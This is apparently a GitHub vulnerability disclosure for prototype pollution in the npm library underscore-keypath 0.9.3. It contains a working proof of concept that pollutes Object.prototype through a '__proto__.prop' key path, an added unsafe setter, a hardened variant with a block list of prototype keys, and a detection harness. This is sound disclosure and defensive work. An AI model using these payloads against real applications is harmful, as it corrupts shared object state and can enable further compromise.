@lelecolacola123
Created April 9, 2023 07:44
Prototype Pollution Vulnerability Disclosure in the "underscore-keypath" library
1、Affected module
The prototype pollution affects underscore-keypath@0.9.3.
underscore-keypath adds key-path mechanism extensions to underscore (as a mixin).
It lets you access JavaScript objects and arrays easily through key paths.
2、relevant package manager/ecosystem
NPM ecosystem
3、Vulnerability details
Prototype pollution vulnerability in the function setProperty() in underscore-keypath.js, in underscore-keypath@0.9.3.
In setProperty(), line 162, the assignment obj[name] = value is the point of prototype pollution.
4、Steps to reproduce
The entry function is setValueForKeyPath(). It does not check key-path segments such as "__proto__", so a bad input like "__proto__" passes through it into setProperty(), where the assignment pollutes the prototype.
var underscore = require("underscore-keypath");

// The first POC: the key path given as an array
// var BAD_ARRAY2 = ['__proto__', 'prop'];
// console.log("Before: " + {}.prop);
// underscore.setValueForKeyPath({}, BAD_ARRAY2, "polluted");
// console.log("After: " + {}.prop);

// The second POC: the key path given as a dotted string
console.log("Before: " + {}.prop);
var BAD_path = "__proto__.prop";
underscore.setValueForKeyPath({}, BAD_path, "polluted");
console.log("After: " + {}.prop);
5、My credit: Yuhan Gao (gyhlelecola@163.com), Peng Zhou (zpbrent@gmail.com)
If you receive my email, please give me a reply. I look forward to your reply.
The affected function, from underscore-keypath.js:
function setProperty(obj, name, value) {
    "use strict";
    var setter = obj["set" + capitalize(name)];
    if (setter) {
        return setter.call(obj, value);
    }
    if (name.indexOf("@") === 0) {
        return setArrayProperty(obj, name, value);
    }
    // line 162: the sink. Once the key-path walk has stepped onto
    // Object.prototype via "__proto__", this writes into the shared prototype.
    obj[name] = value;
    return value;
}
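Added example, not code from the gist or from the underscore-keypath project: a minimal key-path setter with the same walk-and-assign shape as the one described above, beside a hardened variant, plus a check that runs both against the gist's "__proto__.prop" payload and, going beyond the gist, the "constructor.prototype" route. The function names and the harness are assumptions for illustration.

```javascript
const FORBIDDEN = new Set(["__proto__", "constructor", "prototype"]);

// Mirrors the vulnerable behaviour: walk the dotted (or array) key path,
// creating intermediate objects, and assign to whatever the path ends on.
function unsafeSetPath(obj, path, value) {
  const parts = Array.isArray(path) ? path : path.split(".");
  let cur = obj;
  for (let i = 0; i < parts.length - 1; i++) {
    if (cur[parts[i]] === undefined) cur[parts[i]] = {};
    cur = cur[parts[i]]; // "__proto__" here steps onto Object.prototype
  }
  cur[parts[parts.length - 1]] = value; // same sink as obj[name] = value
  return value;
}

// Hardened variant: refuse prototype-walking segments before any write and
// only descend through own, object-valued properties.
function safeSetPath(obj, path, value) {
  const parts = Array.isArray(path) ? path : path.split(".");
  for (const p of parts) {
    if (FORBIDDEN.has(p)) throw new TypeError(`refusing key path segment "${p}"`);
  }
  let cur = obj;
  for (let i = 0; i < parts.length - 1; i++) {
    const own = Object.prototype.hasOwnProperty.call(cur, parts[i]);
    if (!own || typeof cur[parts[i]] !== "object" || cur[parts[i]] === null) {
      cur[parts[i]] = {};
    }
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = value;
  return value;
}

// Detection harness: run a setter on a fresh object and report whether an
// unrelated empty object picked up the final key; then restore Object.prototype.
function pollutes(setter, path) {
  const parts = Array.isArray(path) ? path : path.split(".");
  const key = parts[parts.length - 1];
  try {
    setter({}, path, "polluted");
    return ({})[key] === "polluted";
  } catch (e) {
    return false; // the hardened setter rejected the path
  } finally {
    delete Object.prototype[key];
  }
}

console.log("unsafe:", pollutes(unsafeSetPath, "__proto__.prop")); // true
console.log("safe:  ", pollutes(safeSetPath, "__proto__.prop"));   // false
```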